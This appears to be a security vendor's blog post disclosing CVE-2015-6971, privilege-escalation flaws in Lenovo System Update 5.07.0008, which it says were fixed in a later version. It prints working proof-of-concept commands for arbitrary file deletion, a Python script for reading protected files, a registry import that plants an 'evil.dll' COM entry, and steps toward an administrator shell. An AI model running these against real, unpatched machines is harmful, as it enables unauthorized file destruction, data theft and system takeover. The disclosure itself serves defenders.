About Lenovo System Update Vulnerabilities and CVE-2015-6971

Over the past seven months, a number of vulnerabilities in Lenovo System Update software have come to light. Lenovo patched the first of a batch of these vulnerabilities in spring of this year. I decided to take a deeper look at the patches to verify that they fixed the vulnerability. As a result, I discovered a related vulnerability (CVE-2015-6971), which I will explain in detail below.

Background on the software in question

Most Lenovo-branded computers include a piece of software responsible for keeping the system up-to-date. It checks for new versions of drivers and other software (including Windows patches) specific to the computer hardware configuration. Users can download and install updates via the Lenovo System Update as well.

Vulnerabilities discovered

The original vulnerabilities, discovered by security vendor IOActive, were privilege escalation issues that allowed any local user to elevate privileges to SYSTEM by leveraging design flaws in the software. In examining the patched version 5.06.0034, I found that it wasn't fully patched.

Lenovo System Update 5.06.0034 consists of multiple components. One is a Windows Service running as Local System account. This service accepts user commands via a named pipe channel. Another is a client application that is a signed binary, and the service would refuse to execute commands coming from any application except the signed one. The problem is it's trivial to inject code into a running process originating from a signed binary thereby bypassing the security check performed on the service side. Lenovo issued another fix for this issue in September.

Taking a look at the new version 5.07.0008, I encountered a new set of problems: thanks to a legitimate command for it, unprivileged users can delete arbitrary files from the system.

Here is how this works – code below was tested on Windows 10 32-bit:

In case of 64-bit machine replace %ProgramFiles% with %ProgramFiles(x86)% and examine 32-bit registry location (Wow6432Node) where appropriate.

As Administrator, create a file C:\Users\Administrator\Documents\TopSecret.txt and populate it with some text. Save and close it. Now as regular user execute the following in a command prompt:

"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start

"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute UACSdk.exe /arguments "A1 A2 C:\Users\Administrator\Documents\TopSecret.txt A3" /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND

Notice that the TopSecret.txt is gone by now. So this issue can be used to cause a denial of service if the file is critical to some system component functioning.

Now let's see how an unprivileged user can read any file via this vulnerability. As a part of internal processing, the Lenovo System Update service copies the arbitrary file specified in the example above (C:\Users\Administrator\Documents\TopSecret.txt) to a predictable location readable by users. This makes it trivial to read it by monitoring this location. I created a simple Python script to demonstrate this type of attack:

import sys
while True:
    try:
        # Adjust the path below on 64-bit machine
        f = open("C:\\Program Files\\Lenovo\\System Update\\temp.reg", "r")
        print(f.read())
        f.close()
        break
    except IOError as err:
        sys.stdout.write(".")

Save and execute this script as an unprivileged local user on a machine running Lenovo System Update 5.07.0008 and then re-run the TvsuCommandLauncher.exe snippet shown before. Notice that the file's contents will be printed on the screen and the script will stop.

The next issue allows registry manipulation -- unprivileged users can modify the registry under the HKEY_CLASSES_ROOT as they wish.

As proof-of-concept save the following information in C:\Users\Public\S.log via Notepad as Unicode:

REGEDIT

HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32 evil.dll

Now run (as normal user):

"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start

"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute uacsdk.exe /arguments "A1 A2 C:\Users\Public\S.log A3" /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND

Now examine the registry and notice the new value is there -- this means an attacker can alter existing entries to load malicious code, for example by replacing the InProcServer32 locations of system components. This is possible thanks to the registry file format used in this exploit being ancient (Windows 3.1-style) and the Lenovo software failing to restrict importing from it.

Finally, there is a nice way to execute commands as an administrator due to a vulnerability in command processing.

To see for yourself, as an unprivileged user run the following:

"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start

echo test > C:\Users\Public\S.log

"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute uacsdk.exe /arguments "A1 A2 C:\Users\Public\S.log "" """ /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND

At this point the Lenovo System Update GUI should be visible – keep it open.

Now compile the following small program (copy UNCObject.dll from %ProgramFiles%\Lenovo\System Update\) and run it as the same unprivileged user:

LSUS_SEPT2015

This will open a Command Prompt window running as user with administrative-level access (as a member of the BUILTIN\Administrators group). The system is then fully controlled by an unprivileged user!

Summing up

Multiple vulnerabilities in Lenovo software allow unprivileged users to gain administrative privileges. This is an especially serious problem in corporate environments where Lenovo software is deployed to each Lenovo-branded workstation. Lenovo recently released a new version (5.07.0013) to address these issues, and I've tested that the attacks I explain above are not possible using the new version.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.